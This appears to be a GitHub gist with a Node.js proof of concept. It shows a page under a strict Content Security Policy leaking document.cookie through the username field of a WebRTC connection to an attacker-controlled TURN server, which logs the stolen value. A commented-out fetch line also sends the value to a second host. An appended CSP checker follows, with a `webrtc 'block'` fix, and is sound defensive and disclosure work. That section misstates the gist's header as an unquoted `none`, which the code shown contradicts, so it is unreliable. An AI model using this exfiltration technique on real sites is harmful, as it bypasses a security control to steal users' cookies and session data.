@MatthiasPortzel
Created May 28, 2022 12:58
import express from "express";
import Turn from "node-turn";

// App serves user-controlled HTML inside of a Content Security Policy.
// The app can run JS but shouldn't be able to "phone home" to a remote server.
// This is untrusted.
const CODE = `<!DOCTYPE html>
<html>
<body>
<script>
// In the vulnerable scenario, untrusted code has access to data like cookies
// that it needs to be able to use, but shouldn't be able to send to a 3rd party.
const FLAG = document.cookie || "FLAG";
// This fails like it should. (It also can't load images, etc.)
// fetch("http://localhost:8002?" + FLAG).then(_ => console.log("Attacked!")).catch(_ => console.log("Blocked by CSP"));
// But you can establish an RTCPeerConnection to an untrusted TURN server:
// the TURN username reaches that server, and CSP does not govern WebRTC traffic.
new RTCPeerConnection({
  iceServers: [{
    urls: ["turn:127.0.0.1:3478"],
    // Username field has a max length of 128 bytes, but it's trivial to connect multiple times
    username: FLAG.slice(0, 127),
    credential: "1"
  }],
  // A non-zero pool size makes ICE gathering (and so the TURN request) start immediately
  iceCandidatePoolSize: 1
});
</script>
</body>
</html>`;

const app = express();
app.get("/", (req, res) => {
  // 'none' must be single-quoted: an unquoted `none` is parsed as a host name, not the keyword.
  res.append("Content-Security-Policy", "default-src 'none'; script-src 'unsafe-inline'");
  // This should be secure because the CSP should prevent connections
  res.send(CODE);
});
app.listen(8001, () => console.log("App listening on http://127.0.0.1:8001"));

// This is the "malicious" TURN server
const server = new Turn({
  authMech: "none",
  debugLevel: "ALL",
  debug: function (debugLevel, msg) {
    if (msg instanceof Error) {
      throw msg;
    }
    // node-turn's debug callback is only useful to us for string messages
    if (typeof msg !== "string") return;
    // The username sent by the browser shows up in node-turn's debug output
    const match = msg.match(/username: (.*)/);
    if (match) {
      console.log("Got FLAG!");
      console.log(match[1]);
    }
  },
  credentials: {
    username: "password"
  },
  listeningIps: ["127.0.0.1"]
});
server.start();
{
  "type": "module",
  "dependencies": {
    "express": "^4.17.2",
    "node-turn": "^0.0.6"
  }
}
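Added example, not part of the gist above: a small checker for the two CSP problems the PoC exposes. First, `default-src 'none'` does not stop WebRTC, because the CSP Level 3 `webrtc` directive does not fall back to `default-src`; only an explicit `webrtc 'block'` does. Second, the gist's header uses an unquoted `none`, which browsers read as a host name rather than the keyword. The parser and the two policy strings below are constructed for this example (`HARDENED_CSP` is one possible fix, not the gist author's), and the lint covers the standard keyword list only.

```javascript
// Added example (not from the gist): parse a CSP header and check whether it
// blocks WebRTC and whether it contains unquoted keywords.
// Assumes CSP Level 3 semantics: `webrtc` has no `default-src` fallback.

// Parse a serialized CSP into { directiveName: [sourceExpression, ...] }.
// Directive names are ASCII case-insensitive; if a directive is repeated,
// the first occurrence wins and later ones are ignored (as the spec says).
function parseCsp(header) {
  const policy = {};
  for (const rawDirective of header.split(";")) {
    const tokens = rawDirective.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (Object.prototype.hasOwnProperty.call(policy, name)) continue;
    policy[name] = tokens.slice(1);
  }
  return policy;
}

// Keywords that are only meaningful inside single quotes. Unquoted, the
// browser treats them as host-source expressions, so `default-src none`
// matches a host literally named "none" instead of meaning "nothing".
const CSP_KEYWORDS = new Set([
  "none", "self", "unsafe-inline", "unsafe-eval", "unsafe-hashes",
  "strict-dynamic", "report-sample", "wasm-unsafe-eval", "block", "allow"
]);

// Return one finding per unquoted keyword; an empty array means none found.
function lintCsp(header) {
  const findings = [];
  for (const [name, sources] of Object.entries(parseCsp(header))) {
    for (const src of sources) {
      if (CSP_KEYWORDS.has(src.toLowerCase())) {
        findings.push(`${name}: keyword ${src} must be written as '${src}'`);
      }
    }
  }
  return findings;
}

// True only when the policy carries an explicit `webrtc 'block'`.
// Note that neither `default-src 'none'` nor `connect-src 'none'` counts.
function cspBlocksWebRtc(header) {
  const webrtc = parseCsp(header)["webrtc"];
  return Array.isArray(webrtc)
    && webrtc.length === 1
    && webrtc[0].toLowerCase() === "'block'";
}

// The gist's original header, and a hardened variant (constructed here).
const ORIGINAL_CSP = "default-src none; script-src 'unsafe-inline'";
const HARDENED_CSP = "default-src 'none'; script-src 'unsafe-inline'; webrtc 'block'";

// Summarize a policy the way a reviewer would want to see it.
function reviewCsp(header) {
  return {
    blocksWebRtc: cspBlocksWebRtc(header),
    findings: lintCsp(header)
  };
}

console.log("original:", reviewCsp(ORIGINAL_CSP));
console.log("hardened:", reviewCsp(HARDENED_CSP));
```

To apply this to the gist, the `Content-Security-Policy` value in the `app.get("/")` handler would become `HARDENED_CSP`. Browser support for the `webrtc` directive varies, so a policy that relies on it should be verified against the engines the untrusted content will actually run in, and the checker above only tells you whether the header asks for the block, not whether a given browser honours it.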